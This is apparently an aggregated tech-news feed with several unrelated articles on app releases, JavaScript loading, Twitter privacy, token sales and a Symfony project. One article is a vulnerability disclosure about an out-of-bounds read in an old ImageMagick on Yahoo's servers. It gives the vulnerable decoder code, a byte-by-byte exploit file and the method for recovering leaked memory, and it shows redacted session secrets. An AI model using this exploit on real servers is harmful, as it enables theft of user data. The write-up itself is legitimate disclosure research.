The increased use of PowerShell in attacks [pdf]

May 19, 2017, 3:31 am

≫ Next: How Etsy Ships Apps

≪ Previous: Show HN: Moon – a tiny 6kb Javascript library inspired by Vue.js

Download PDF

↧

How Etsy Ships Apps

May 19, 2017, 11:03 am

≫ Next: Qhasm: tools to help write high-speed software

≪ Previous: The increased use of PowerShell in attacks [pdf]

In which Etsy transforms its app release process by aligning it with its philosophy for web deploys

Anchors Aweigh

Deploying code should be easy. It should happen often, and it should involve its engineers. For Etsyweb, this looks like continuous deployment.

A group of engineers (which we call a push train) and a designated driver all shepherd their changes to a staging environment, and then to production. At each checkpoint along that journey, the members of the push train are responsible for testing their changes, sharing that they’re ready to ship, and making sure nothing broke. Everyone in that train must work together for the safe completion of their deployment. And this happens very frequently: up to 50 times a day.

                                               TOPIC: clear
 mittens> .join                                TOPIC: mittens
   sasha> .join with mittens                   TOPIC: mittens + sasha
 pushbot> mittens, sasha: You're up            TOPIC: mittens + sasha
   sasha> .good                                TOPIC: mittens + sasha*
 mittens> .good                                TOPIC: mittens* + sasha*
 pushbot> mittens, sasha: Everyone is ready    TOPIC: mittens* + sasha*
  nassim> .join                                TOPIC: mittens* + sasha* | nassim
 mittens> .at preprod                          TOPIC: <preprod> mittens + sasha | nassim
 mittens> .good                                TOPIC: <preprod> mittens* + sasha | nassim
   sasha> .good                                TOPIC: <preprod> mittens* + sasha* | nassim
 pushbot> mittens, sasha: Everyone is ready    TOPIC: <preprod> mittens* + sasha* | nassim
 mittens> .at prod                             TOPIC: <prod> mittens + sasha | nassim
 mittens> .good                                TOPIC: <prod> mittens* + sasha | nassim
     asm> .join                                TOPIC: <prod> mittens* + sasha | nassim + asm
   sasha> .good                                TOPIC: <prod> mittens* + sasha* | nassim + asm
     asm> .nm                                  TOPIC: <prod> mittens* + sasha* | nassim
 pushbot> mittens, sasha: Everyone is ready    TOPIC: <prod> mittens* + sasha* | nassim
 mittens> .done                                TOPIC: nassim
 pushbot> nassim: You're up                    TOPIC: nassim
    lily> .join                                TOPIC: nassim | lily

This strategy has been successful for a lot of reasons, but especially because each deploy is handled by the people most familiar with the changes that are shipping. Those that wrote the code are in the best position to recognize it breaking, and then fix it. Because of that, developers should be empowered to deploy code as needed, and remain close to its rollout.

App releases are a different beast. They don’t easily adapt to that philosophy of deploying code. For one, they have versions and need to be compiled. And since they’re distributed via app stores, those versions can take time to reach end users. Traditionally, these traits have led to strategies involving release branches and release managers. Our app releases started out this way, but we learned quickly that they didn’t feel very Etsy. And so we set out to change them.

Jen and Sasha

We were the release managers. Jen managed the Sell on Etsy apps, and I managed the Etsy apps. We were responsible for all release stage transitions, maintaining the schedule, and managing all the communications around releases. We were also responsible for resolving conflicts and coordinating cross-team resources in cases of bugs and urgent blockers to release.

Ready to Ship

A key part of our job was making sure everyone knew what they’re supposed to do and when they’re supposed to do it. The biggest such checkpoint is when a release branches — this is when we create a dedicated branch for the release off master, and master becomes the next release. This is scheduled and determines what changes make it into production for a given release. It’s very important to make sure that those changes are expected, and that they have been tested.

For Jen and me, it would’ve been impossible to keep track of the many changes in a release ourselves, and so it was our job to coordinate with the engineers that made the actual changes and make sure those changes were expected and tested. In practice, this meant sending emails or messaging folks when approaching certain checkpoints like branching. And likewise, if there were any storm warnings (such as show-stopping bugs), it was our responsibility to raise the flag to notify others.

Then Jen left Etsy for another opportunity, and I became a single-point-of-failure and a gatekeeper. Every release decision was funneled through me, and I was the only person able to make and execute those decisions.

I was overwhelmed. Frustrated. I was worried I’d be stuck navigating iTunes Connect and Google Play, and sending emails. And frankly, I didn’t want to be doing those things. I wanted those things to be automated. Give me a button to upload to iTunes Connect, and another to begin staged rollout on Google Play. Thinking about the ease of deploying on web just filled me with envy.

This time wasn’t easy for engineers either. Even back when we had two release managers, from an engineer’s perspective, this period of app releases wasn’t transparent. It was difficult to know what phase of release we were in. A large number of emails was sent, but few of them were targeted to those that actually needed them. We would generically send emails to one big list that included all four of our apps. And all kinds of emails would get sent there. Things that were FYI-only, and also things that required urgent attention. We were on the path to alert-fatigue.

All of this meant that engineers felt more like they were in the cargo hold, rather than in the cockpit. But that just didn’t fit with how we do things for web. It didn’t fit with our philosophy for deployment. We didn’t like it. We wanted something better, something that placed engineers in front of the tiller.

Ship

So we built a vessel that coordinates the status, schedule, communications, and deploy tools for app releases. Here’s how Ship helps:

Keeps track of who committed changes to a release
Sends Slack messages and emails to the right people about the relevant events
Manages the state and schedule of all releases

It’s hard to imagine all of that abstractly, so here’s an example:

Captain’s Log

Monday

A cron moves the release into “Testing” and generates testing build v4.64.0.52.
Ship is notified of this and sends an email to Alicia with the build.
Alicia installs the build, verifies her changes, and tells Ship she’s ready.

Tuesday

Wednesday

The final testing finds no show-stopping issues
A cron submits v4.64.0 to iTunes Connect for review.

Friday

A cron checks iTunes Connect for the review status of this release, and updates Ship that it’s been approved.
Ship emails Alicia and others letting them know the release is approved.

Tuesday

A cron releases v4.64.0.
(Had Alicia committed to our Android app, a cron would instead begin staged rollout on Google Play.)
Ship emails Alicia and others letting them know the release is out in production.

Wednesday

Ship emails a report of top crashes to all the engineers in the release (including Alicia)

Before Ship, all of these components above would’ve been performed manually. But you’ll notice that release managers are missing from the above script; have we replaced release managers with all the automations in Ship?

Release Drivers

Partially. Ship has a feature where each release is assigned a driver.

This driver is responsible for a bunch of things that we couldn’t or shouldn’t automate. Here’s what they’re responsible for:

Schedule changes
Shepherding ‘ready to ships’ from other engineers
Investigating showstopping bugs before release

Everything else? That’s automated. Branching, release candidate generation, submission to iTunes Connect — even staged rollout on Google Play! But, we’ve learned from automation going awry before. By default, some things are set to manual. There are others for which Ship explicitly does not allow automation, such as continuing staged rollout on Google Play. Things like this should involve and require human interaction. For everything else that is automated, we added a failsafe: at any time, a driver can disable all the crons and take over driving from autopilot:

When a driver wants to do something manually, they don’t need access to iTunes Connect or Google Play, as each of these things is made accessible as a button. A really nice side effect of this is that we don’t have to worry about provisioning folks for either app store, and we have a clear log of every release-related action taken by drivers.

Drivers are assigned once a release moves onto master, and are semi-randomly selected based on previous drivers and engineers that have committed to previous releases. Once assigned, we send them an onboarding email letting them know what their responsibilities are:

Ready to Ship Again

The driver can remain mostly dormant until the day of branching. A couple hours before we branch, it’s the driver’s responsibility to make sure that all the impacting engineers are ready to ship, and to orchestrate efforts when they’re not. After we’re ready, the driver’s responsibility is to remain available as a point-of-contact while final testing takes place. If an issue comes up, the driver may be consulted for steps to resolve.

And then, assuming all goes well, comes release day. The driver can opt to manually release, or let the cron do this for them — they’ll get notified if something goes wrong, either way. Then a day after we release, the driver looks at all of our dashboards, logs, and graphs to confirm the health of the release.

Bugfixes

But not all releases are planned. Things fail, and that’s expected. It’s naïve to assume some serious bug won’t ship with an app release. There’s plenty of things that can and will be the subject of a post-mortem. When one of those things happens, any engineer can spawn a bugfix release off the most-recently-released mainline release.

The engineer that requests this bugfix gets assigned as the driver for that release. Once they branch the release, they make the necessary bugfixes (others can join in to add bugfixes too, if they coordinate with the driver) in the release’s branch, build a release candidate, test it, and get it ready for production. The driver can then release it at will.

State Machine

Releases are actually quite complicated.

It starts off as an abstract thing that will occur in the future. Then becomes a concrete thing actively collecting changes via commits on master in git. After this period of collecting commits, the release is considered complete and moves into its own dedicated branch. The release candidate is then built from this dedicated branch, which then gets thoroughly tested, and moved into production. The release itself then concludes as an unmerged branch.

Once a release branches, the next future release moves onto master. Each release is its own state machine, where the development and branching states overlap between successive releases.

Notifications: Slack and Email

Plugged into the output of Ship are notifications. Because there are so many points of interest en route to production, it’s really important that the right people are notified at the right times. So we use the state machine of Ship to send out notifications to engineers (and other subscribers) based on how much they asked to know, and how they impacted the release. We also allow anyone to sign up for notifications around a release. This is used by product managers, designers, support teams, engineering managers, and more. Our communications are very targeted to those that need or want them.

In terms of what they asked to know, we made it very simple to get detailed emails about state changes to a release:

In terms of how they impacted the release, we need to get that data from somewhere else.

Git

We mentioned data Ship receives from outside sources. At Etsy, we use GitHub for our source control. Our apps have repos per-platform (Android and iOS). In order to keep Ship’s knowledge of releases up-to-date, we set up GitHub Webhooks to notify Ship whenever changes are pushed to the repo. We listen for two changes in particular: pushes to master, and pushes to any release branch.

When Ship gets notified, it iterates through the commits and uses the author, changed paths, and commit message to determine which app (buyer or seller) the commit affects, and which release we should attribute this change to. Ship then takes all of that and combines it into a state that represents every engineer’s impact on a given release. Is that engineer “user-impacting” or “dark” (our term for changes that aren’t live)? Ship then uses this state to determine who is a member of what release, and who should get notified about what events.

Additionally, at any point during a release, an engineer can change their status. They may want to do this if they want to receive more information about a release, or if Ship misunderstood one of their commits as being impacting to the release.

Deployinator

Everything up until has explained how Ship keeps track of things. But there’s been no explanation for how some of the automated actions affecting the app repo or things outside Etsy occur.

We have a home-grown tool for managing deploys called Deployinator, and we added app support. It can now perform mutating interactions with the app repos, as well as all the deploy actions related to Google Play and iTunes Connect. This is where we build the testing candidates, release candidate, branch the release, submit to iTunes Connect, and much more.

We opted to use Deployinator for a number of reasons:

Etsy engineers are already familiar with it
It’s our go-to environment for wrapping up a build process into a button
Good for things that need individual run logs, and clear failures

In our custom stack, we have crons. This is how we branch on Tuesday evening (assuming everyone is ready). This is where we interface with Google Play and iTunes Connect. We make use of Google Play’s official API in a custom python module we wrote, and for iTunes Connect we use Spaceship to interface with the unofficial API.

Seaworthy

The end result of Ship is that we’ve distributed release management. Etsy no longer has any dedicated release managers. But it does have an engineer who used to be one — and I even get to drive a release every now and then.

People cannot be fully automated away. That applies to our web deploys, and is equally true for app releases. Our new process works within that reality. It’s unique because it pushes the limit of what we thought could be automated. Yet, at the same time, it empowers our app engineers more than ever before. Engineers control when a release goes to prod. Engineers decide if we’re ready to branch. Engineers hit the buttons.

And that’s what Ship is really about. It empowers our engineers to deliver the best apps for our users. Ship puts engineers at the helm.

↧

Qhasm: tools to help write high-speed software

May 19, 2017, 10:09 am

≫ Next: Managing Async Dependencies with JavaScript

≪ Previous: How Etsy Ships Apps

qhasm: tools to help write high-speed softwareD. J. Bernstein
Computer hardware What is a portable assembly language?
Does a free swap turn a stack into a traditional register set?
Some relevant literature

There's a mailing list for discussions among potential qhasm users ("How could I do this with qhasm?"), actual qhasm users ("Here's a .q file I wrote"), potential users of software produced by qhasm ("Can you qhasm people speed up this time-critical function for me?"), and qhasm contributors ("Here's a new machine description"). To subscribe, send an empty message to qhasm-subscribe@list.cr.yp.to.

One introduction to qhasm is the following short talk that I gave:2005.02.21, "Have any challenges for qhasm?" The online notes for my Fall 2006 course onhigh-speed cryptography included a much more detailed example of using qhasm to write software for a serious cryptographic application.

WARNING WARNING WARNING: qhasm is in prototype form. The existing qhasm tools and interfaces have produced high-speed professional-quality software for several applications, but they are not themselves professional-quality tools; they have many known deficiencies and many sharp corners. Each of the qhasm tools has at least one complete rewrite planned. The .q language is not stable; if you write .q files then you should plan on having to modify them extensively for future qhasm releases. The machine-description language has a stable structure but is still undergoing tweaks; I can incorporate machine descriptions into qhasm and keep them up to date, but I won't promise that non-incorporated descriptions will continue to work. The prototypes of qhasm's cycle counter, range analyzer, and scheduler are several generations behind the current .q language and, as a practical matter, aren't usable right now.

Not scared? Okay. Here's how to download and compile the current prototypes of qhasm's instruction decoder, register allocator, x86-floating-point-stack handler, and assembler:

wget http://cr.yp.to/qhasm/qhasm-20070207.tar.gz gunzip No installation script at this point. To process .q files you'll need to be inside the qhasm compilation directory to run ./qhasm-x86 etc.

Here are some examples of .q files (in some cases needing updates for the latest qhasm prototype!) and the resulting .s files:

↧

Managing Async Dependencies with JavaScript

May 19, 2017, 4:53 pm

≫ Next: How to Opt Out of Twitter's New Privacy Settings

≪ Previous: Qhasm: tools to help write high-speed software

I’ve long been inspired by the work of Steve Souders. In 2009 he published an article titled Loading Scripts Without Blocking, which I first became aware of and studied during my time at Orbitz– where every millisecond a user waited for the page to load had a measurable impact to the business.

Steve’s work was instrumental for the Web development community, and even inspired Nicholas C. Zakas to write Loading JavaScript without Blocking the same month Steve’s book Even Faster Web Sites was published.

In his article, Steve covers six techniques for loading scripts without blocking:

XHR Eval,
XHR Injection,
Script in Iframe,
Script DOM Element,
Script Defer, and;
document.write Script Tag.

Web developers unfamiliar with the above techniques are more likely familiar with the async and defer attributes introduced with HTML5, which make it easier to load scripts without blocking the initial page render.

There’s an ugly gotcha, though, when loading scripts asynchronously. It occurs anytime dependent scripts are loaded. Loading asynchronous scripts with dependencies can lead to race conditions.

The problem lingers

To illustrate, let’s look at a popular open source UI framework inching its way toward general public use: Bootstrap 4.

Using Bootstrap 4 will require the following script dependencies:

Of the three, two are required to load before Bootstrap itself. If these scripts were all loaded asynchronously using the async attribute, the resulting code might look something like this:

<scriptasyncsrc="https://cdn.jsdelivr.net/jquery/3.1.1/jquery.slim.min.js"></script><scriptasyncsrc="https://cdn.jsdelivr.net/tether/1.4.0/tether.min.js"></script><scriptasyncsrc="https://cdn.jsdelivr.net/bootstrap/4.0.0/js/bootstrap.min.js"></script>

This is where the trouble starts. Given the dependencies, if Bootstrap itself isn’t the last to finish downloading, it will execute immediately when finished – attempting to initialize itself – throw an undefined error and fail to initialize entirely.

What’s worse, the error will happen intermittently due to network conditions, making the cause of the race condition harder to detect.

To mitigate the problem, official Bootstrap prerelease documentation does what other major UI frameworks do, and simply does not promote use of the async attribute. This, in effect, punts the problem to userland and will lead many websites to not one, not two, but three scripts causing blocking behavior and jank in the UI.

Those who’re unaware of Steve’s work may not understand these shortcomings, and will likely copypasta Bootstrap’s code – along with the blocking behavior – directly into their source.

Others may choose to use a bundler to concatenate all of the JavaScript files into one or two packages, and load them asynchronously to avoid these problems, typically leading to a SEO-unfriendly Single-Page Application primed for Front-end SPOF.

What most don’t know though, is there’s a better way. And it doesn’t require any sacrifices to SEO, UX, speed or accessibility.

Introducing Fetch Inject

To help address the problem of loading scripts without blocking I created a JavaScript library called fetch-inject.

Fetch Inject introduces a new technique to the Web – let’s call it Fetch Injection – to dynamically inline assets into the DOM.

Here’s how it fits into Souders’ original script loading techniques:

XHR Eval,
XHR Injection,
Fetch Injection,
Script in Iframe,
Script DOM Element,
Script Defer, and;
document.write Script Tag.

Similar to XHR Injection, Fetch Injection loads a remote resource and inlines it into the DOM. Unlike XHR Injection, however, fetch-inject leverages the Fetch API instead of Ajax.

Here’s how fetch-inject can be used to load a script asynchronously and without the blocking behavior previously discussed:

fetchInject(['https://cdn.jsdelivr.net/lodash/4.17.4/lodash.min.js'])

As you may have noticed, the fetchInject method takes an Array argument, allowing it to make parallel asynchronous downloads:

1 fetchInject([2 'https://cdn.jsdelivr.net/lodash/4.17.4/lodash.min.js',3 'https://cdn.jsdelivr.net/momentjs/2.17.1/moment.min.js'4 ])

But why stop at scripts? Why not use it inject stylesheets too:

1 fetchInject([2 'https://cdn.jsdelivr.net/lodash/4.17.4/lodash.min.js',3 'https://cdn.jsdelivr.net/momentjs/2.17.1/moment.min.js',4 '//cdn.jsdelivr.net/fontawesome/4.7.0/css/font-awesome.min.css'5 ])

And because it uses fetch under the hood, it’s possible to couple async and synchronous code using then:

1 fetchInject([2 'https://cdn.jsdelivr.net/lodash/4.17.4/lodash.min.js',3 'https://cdn.jsdelivr.net/momentjs/2.17.1/moment.min.js'4 ]).then(()=>{5 console.log(6 `${_.capitalize(moment().endOf('year').fromNow())} we'll be heroes.`7 )8 })

Which, in turn, enables async dependency management for loading JavaScript-driven UIs like Bootstrap 4 asynchronously and in parallel (including font icons):

1 fetchInject([2 'https://npmcdn.com/bootstrap@4.0.0-alpha.5/dist/js/bootstrap.min.js'3 ],fetchInject([4 'https://cdn.jsdelivr.net/jquery/3.1.1/jquery.slim.min.js',5 'https://npmcdn.com/tether@1.2.4/dist/js/tether.min.js',6 'https://cdn.jsdelivr.net/fontawesome/4.7.0/css/font-awesome.min.css'7 ])

The fetch-inject library itself makes the Fetch Injection technique available to everyone via an easy-to-use API. It has no hard dependencies, is about 600 bytes minified and gzipped and comes at you ISC-licensed.

To get started, install the library from NPM with npm i fetch-inject or bower with bower install fetch-inject. Please see the README for additional installation options and more detail.

Looking back towards the future

It’s been a long-time coming, but things are starting to look up for the future of the Web thanks to ES6 and the Fetch API. And with HTTP/2 and ES6 modules right around the corner, expect to see more performant websites worldwide, available on more devices at connection speeds never before possible.

We’ve come a long way since Steve published Even Faster Websites, and there’s still a long way to go to make the Web accessible to everyone. But an accessible Web should be our primary goal. And new techniques like Fetch Injection will help get us there.

↧

How to Opt Out of Twitter's New Privacy Settings

May 19, 2017, 10:12 pm

≫ Next: Coinlist

≪ Previous: Managing Async Dependencies with JavaScript

Since Wednesday night, Twitter users have been greeted by a pop-up notice about Twitter’s new privacy policy, which will come into effect June 18:

Contrary to the inviting “Sounds good” button to accept the new policy and get to tweeting, the changes Twitter has made around user tracking and data personalization do not sound good for user privacy. For example, the company will now record and store non-EU users’ off-Twitter web browsing history for up to 30 days, up from 10 days in the previous policy.

Worst of all, the “control over your data” promised by the pop-up is on an opt-out basis, giving users choices only after Twitter has set their privacy settings to invasive defaults.

Instead, concerned users have to click “Review settings” to opt out of Twitter’s new mechanisms for user tracking. That will bring you to the “Personalization and Data” section of your settings. Here, you can pick and choose the personalization, data collection, and data sharing you will allow—or, click “Disable all” in the top-right corner to opt out entirely.

If you already clicked through the privacy policy pop-up, you can still go into your settings to make these changes. After navigating to your settings, choose “Privacy and safety” on the left, and then click “Edit” next to “Personalization and data.”

While you’re at it, this is also a good opportunity to review, edit, and/or remove the data Twitter has collected on you in the past by going to the “Your Twitter data” section of your settings.

Twitter has stated that these granular settings are intended to replace Twitter’s reliance on Do Not Track. However, replacing a standard cross-platform choice with new, complex options buried in the settings is not a fair trade. Although “more granular” privacy settings sound like an improvement, they lose their meaning when they are set to privacy-invasive selections by default. Adding new tracking options that users are opted into by default suggests that Twitter cares more about collecting data than respecting users’ choice.

↧

Coinlist

May 19, 2017, 5:33 pm

≫ Next: Dumping Yahoo authentication secrets with an out-of-bounds read

≪ Previous: How to Opt Out of Twitter's New Privacy Settings

Some interesting developments that we have been working on came public yesterday.

Protocol Labs, a company that builds blockchain-based protocols laid out its ambitious roadmap and finally got around to announcing the seed investment USV and others made in it last year. My partner Brad Burnham wrote a blog post on USV.com explaining why we are so excited about Protocol Labs.
Protocol Labs will be launching a token offering soon for Filecoin which powers a blockchain based storage network on top of its IPFS protocol.
The Filecoin offering will be managed on a new platform called Coinlist which was built by Protocol Labs and AngelList.
Coinlist will utilize a new kind of security called a SAFT (Simple Agreement for Future Tokens) that has been constructed to comply with existing securities regulations.

While all of these are interesting developments, particularly the architecture and roadmap that Protocol Labs laid out, I thought I would talk a bit about Coinlist given that it is “Funding Friday.”

Token Offerings have been going on for quite a while now. There are over 800 tokens listed on Coin Market Cap.

But US domiciled companies have not had a good way to raise money in token pre-sales and comply with existing securities laws. This forced a number of promising blockchain projects to domicile outside of the US, often in Switzerland, and organize as Foundations for tax reasons. A US domiciled company can wait until the token is live and functioning and sell it then, because at that point it is not a security, it is a token. But if you want to raise funds in a pre-sale for a US domiciled company, there has not been a good way to do that.

Enter Juan Benet, founder of Protocol Labs, and Naval Ravikant, founder of AngelList. They collaborated on CoinList and, with the help of a number of venture law firms and their investors, including USV, came up with the SAFT structure.

Naval put it like this in a Forbes piece yesterday on all of this:

ICOs are obviously a new and interesting form of funding for blockchain-based protocols. But it’s not clear that all of them comply with U.S. securities laws or that all of them are companies that have good native use cases for new coins. So, we wanted to use a high-quality coin and team to trailblaze a legal and compliant ICO.

If you are an accredited investor and want to participate in token pre-sales, check out Coinlist.

↧

Dumping Yahoo authentication secrets with an out-of-bounds read

May 19, 2017, 4:37 pm

≫ Next: An open-source web platform for the new President of France

≪ Previous: Coinlist

Overview

In my previous post on Yahoobleed #1 (YB1), we saw how an uninitialized memory vulnerability could lead to disclosure of private images belonging to other users. The resulting leaked memory bytes were subject to JPEG compression, which is not a problem for image theft, but is somewhat lacking if we wanted to steal memory content other than images.

In this post, we explore an alternative *bleed class vulnerability in Yahoo! thumbnailing servers. Let's call it Yahoobleed #2 (YB2). We'll get around the (still present) JPEG compression issue to exfiltrate raw memory bytes. With subsequent usage of the elite cyberhacking tool "strings", we discover many wonders.

Yahoo! fixed YB2 at the same time as YB1, by retiring ImageMagick. See my previous post for a more detailed list of why Yahoo! generally hit this out of the park with their response.

Visualization

The above patch of noise is a PNG (i.e lossless) and zoomed rendering of a 64x4 subsection of a JPEG image returned from Yahoo! servers when we trigger the vulnerability.

There are many interesting things to note about this image, but for now we'll observe that... is that a couple of pointers we see at the top?? I have a previous Project Zero post about pointer visualization and once you've seen a few pointers, it gets pretty easy to spot them across a variety of leak situations. Well, at least for Linux x86_64, where pointers often have a common prefix of 0x00007f. The hallmarks of the pointers above are:

Repeating similar structures with the same alignment (8 bytes on 64-bit).
In blocks of pointers, vertical stripes of white towards where the most significant bytes are aligned, representing 0x00. (Note that the format of the leaked bytes is essentially "negated" because of the input file format.)
Again in blocks of pointers, vertical stripes of black next to that, representing 7 bits set in a row of the 0x7f value.
And again in blocks of pointers, a thin vertical stripe of white next to that, representing the 1 bit not set in the 0x7f value.

But we still see JPEG compression artifacts. Will that be a problem for precise byte-by-byte data exfiltration? We'll get to it later.

The vulnerability

The hunt for this vulnerability starts with the realization that we don't know if Yahoo! is running an uptodate ImageMagick or not. Given that we know Yahoo! supports the RLE format, perhaps we can use the same techniques outlined in my previous post about memory corruption in Box.com? Interestingly enough, the crash file doesn't seem to crash anything but all the test files do seem to render instead of failing cleanly as would be expected with an uptodate ImageMagick. After some pondering, the most likely explanation is that the Yahoo! ImageMagick is indeed old and vulnerable, but the different heap setup we learned out about with YB1 means that the out-of-bounds heap write test case has no effect due to alignment slop.

To test this hypothesis, we make an out-of-bounds heap write RLE file that substantially overflows a smaller chunk (64 bytes, with a 16 byte or so overflow), and upload that to Yahoo!
And sure enough, hitting the thumbnail fetch URL fairly reliably (50% or so) results in:

This looks like a very significant backend failure, and our best guess is a SIGSEGV due to the presence of the 2+ years old RLE memory corruption issue.

But our goal today is not to exploit an RCE memory corruption, although that would be fun. Our goal is to exfiltrate data with a *bleed attack. So, we have an ImageMagick that is about 2.5 years old. In that timeframe, surely lots of other interesting vulnerabilities have been fixed? After a bit of looking around, we settle on an interesting candidate: this 2+ years old out-of-bounds fix in the SUN decoder. The bug fix appears to be taking a length check and applying it more thoroughly so that it includes images with a bit depth of 1. Looking at the code slightly before this patch, and tracing through the decode path for an image with a bit depth of 1, we get (coders/sun.c):

sun_info.width=ReadBlobMSBLong(image);
sun_info.height=ReadBlobMSBLong(image);
sun_info.depth=ReadBlobMSBLong(image);
sun_info.length=ReadBlobMSBLong(image);
[...]
number_pixels=(MagickSizeType) image->columns*image->rows;
if ((sun_info.type != RT_ENCODED) && (sun_info.depth >= 8) &&
((number_pixels*((sun_info.depth+7)/8)) > sun_info.length))
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
bytes_per_line=sun_info.width*sun_info.depth;
sun_data=(unsigned char *) AcquireQuantumMemory((size_t) sun_info.length,
sizeof(*sun_data));
[...]
count=(ssize_t) ReadBlob(image,sun_info.length,sun_data);
if (count != (ssize_t) sun_info.length)
ThrowReaderException(CorruptImageError,"UnableToReadImageData");

sun_pixels=sun_data;
bytes_per_line=0;
[...]
p=sun_pixels;
if (sun_info.depth == 1)
for (y=0; y < (ssize_t) image->rows; y++)
{
q=QueueAuthenticPixels(image,0,y,image->columns,1,exception);
if (q == (Quantum *) NULL)
break;
for (x=0; x < ((ssize_t) image->columns-7); x+=8)
{
for (bit=7; bit >= 0; bit--)
{
SetPixelIndex(image,(Quantum) ((*p) & (0x01 << bit) ? 0x00 : 0x01),
q);
q+=GetPixelChannels(image);
}
p++;
}

So in the case of an image with a depth of 1, we see a fairly straightforward problem:

Let's say we have width=256, height=256, depth=1, length=8.
Image of depth 1 bypasses check of number_pixels against sun_info.length.
sun_data is allocated to be a buffer of 8 bytes, and 8 bytes are read from the input file.
Decode of 1 bit per pixel image proceeds. (256*256)/8 == 8192 bytes are required in sun_data but only 8 are present.
Massive out-of-bounds read ensues; rendered image is based largely on out-of-bounds memory.

The exploit

The exploit SUN file is only 40 bytes, so we might as well show a gratuitous screenshot of the file in a hex editor, and then dissect the exact meaning of each byte:

59 A6 6A 95: header
00 00 01 00 00 00 01 00: image dimensions 256 x 256
00 00 00 01: image depth 1 bit per pixel
00 00 00 08: image data length 8
00 00 00 01: image type 1: standard
00 00 00 00 00 00 00 00: map type none, length 0
41 41 41 41 41 41 41 41: 8 bytes of image data

The most interesting variable we can twiddle in this exploit file is the image data length. As long as we keep it smaller than (256 * 256) / 8, we'll get the out of bounds read. But where will this out of bounds read start? It will start from the end of the allocation of the image data. By changing the size of the image data, we may end up occupying different relative locations within the heap area (perhaps more towards the beginning or end with certain sizes). This flexibility gives us a greater chance of being able to read something interesting.

Exfiltration

Exfiltration is where the true usefulness of this exploit becomes apparent. As noted above in the vizualization section, the result of our exfiltration attempt is a JPEG compressed file. We actually get a greyscale JPEG image out of ImageMagick, since the 1 bit per pixel SUN file generates a black and white drawing. A greyscale JPEG is a good start for reliable exfiltration, because JPEG compression is designed to hack human perception. Human visualization is more sensitive to color brightness than it is to actual color, so color data is typically compressed more lossily than brightness data. (This is achieved via the YCbCr colorspace.) But with greyscale JPEGs there is only brightness.

But looking at the exfiltrated JPEG image above, we still see JPEG compression artifacts. Are we doomed? Actually, no. Since our SUN image was chosen to be a 1 bit per pixel (black or white) image, then we only need to preserve 1 bit of accurate entropy per pixel in the exfiltrated JPEG file! Although some of the white pixels are a little bit light grey instead of fully white, and some of the black pixels are a little bit dark grey instead of fully black, each pixel is still very close to black or white. I don't have a mathematical proof of course, but it appears that for the level of JPEG compression used by the Yahoo! servers, every pixel has its 1 bit of entropy intact. The most deviant pixels from white still appear to be about 85% white (i.e. very light grey) whereas the threshold for information loss would of course be 50% or below.

We can attempt to recover raw bytes from the JPEG file with an ImageMagick conversion command like this:

convert yahoo_file.jpg -threshold 50% -depth 1 -negate out.gray

For the JPEG file at the top of this post, the resulting recovered original raw memory bytes are:

0000000 d0 f0 75 9b 83 7f 00 00 50 33 76 9b 83 7f 00 00
0000020 31 00 00 00 00 00 00 00 2c 00 00 00 00 00 00 00

Those pointers, 0x00007f839b75f0d0 and 0x00007f839b763350, look spot on.

The strings and secrets

So now that we have a reliable and likely byte perfect exfiltration primitive, what are some interesting strings in the memory space of the Yahoo! thumbnail server? With appropriate redactions representing long high entropy strings,

SSLCOOKIE: SSL=v=1&s=redacted&kv=0

Yahoo-App-Auth: v=1;a=yahoo.mobstor.client.mailtsusm2.prod;h=10.210.245.245;t=redacted;k=4;s=redacted

https://dl-mail.ymail.com/ws/download/mailboxes/@.id==redacted/messages/@.id==redacted/content/parts/@.id==2/raw?appid=getattachment&token=redacted&ymreqid=redacted

Yeah, it's looking pretty serious.

In terms of interesting strings other than session secrets, etc., what else did we see? Well, most usefully, there's some paths, error messages and versions strings that would appear to offer a very precise determination that indeed, ImageMagick is here and indeed, it is dangerously old:

/usr/lib64/ImageMagick-6.8.9/modules-Q16/coders/sun.so
ImageMagick 6.8.9-6 Q16 x86_64 2014-07-25 http://www.imagemagick.org

unrecognized PerlMagick method

Obviously, these strings made for a much more convincing bug report. Also note the PerlMagick reference. I'm not familiar with PerlMagick but perhaps PerlMagick leads to an in-process ImageMagick, which is why our out-of-bounds image data reads can read so much interesting stuff.

Conclusion

This was fun. We found a leak that encoded only a small amount of data per JPEG compressed pixel returned to us, allowing us to reliably reconstruct original bytes of exfiltrated server memory.

The combination of running an ImageMagick that is both old and also unrestricted in the enabled decoders is dangerous. The fix of retiring ImageMagick should take care of both those issues :)

↧

An open-source web platform for the new President of France

May 19, 2017, 5:13 am

≫ Next: Breaking Through the Normalization Barrier: A Self-Interpreter for F-omega [pdf]

≪ Previous: Dumping Yahoo authentication secrets with an out-of-bounds read

This Case Study is a guest post written by Titouan Galopin, lead engineer and product lead at EnMarche project. Please note that this is a strictly technical article; any political comment will be automatically deleted.

Want your company featured on the official Symfony blog? Send a proposal or case study to fabien.potencier@sensiolabs.com

Project Background

In April 2016, Emmanuel Macron, now President of France, created a political movement called "En Marche!" ("On the Move" in English), initially as a door-to-door operation to ask the public what was wrong with France.

Unlike established political parties, En Marche! didn't have any infrastructure, budget or members to support its cause. That's why En Marche! relied on the power of Internet since its very beginning to find supporters, promote events and collect donations.

I started to work for En Marche! as a volunteer in October 2016. The team was small and all of the IT operations were maintained by just one person. So they gladly accepted my proposal to help them. At that time, the platform was created with WordPress, but we needed to replace it with something that allowed faster and more customized development. The choice of Symfony was natural: it fits the project size well, I have experience with it and it scales easily to handle the large number of users we have.

Architecture overview

Scalability was the top priority of the project, especially after the issues they faced with the first version of the platform that wasn't built with Symfony. The following diagram shows an overview of the project architecture, which is extremely scalable and redundant where needed:

We use Google Container Engine and Kubernetes to provide scalability, rolling updates and load balancing.

The Symfony app is built from the ground as a Dockerized application. The configuration uses environment variables and the application is read-only to keep it scalable: we don't generate any files at run-time in the container. The application cache is generated when building the Docker image and then is synchronized amongst the servers using the Symfony Cache component combined with a Redis instance.

There are two workers, fed by RabbitMQ, to process some heavy operations in the background: sending emails (sometimes we have to send 45k emails in a single request) and building the serialized JSON users lists that are used by several parts of the application to avoid dealing with slow and complex SQL queries.

The database uses Google Cloud SQL, a centralized MySQL database we don’t have to manage. To connect to it, we use the Cloud SQL proxy Docker image.

Deployment

The project uses a Continuous Delivery strategy, which is different from the Continuous Deployment approach: each commit is automatically deployed on a staging server but the production deployment is manual. Google Container Engine and Kubernetes are the key components to our deployment flow.

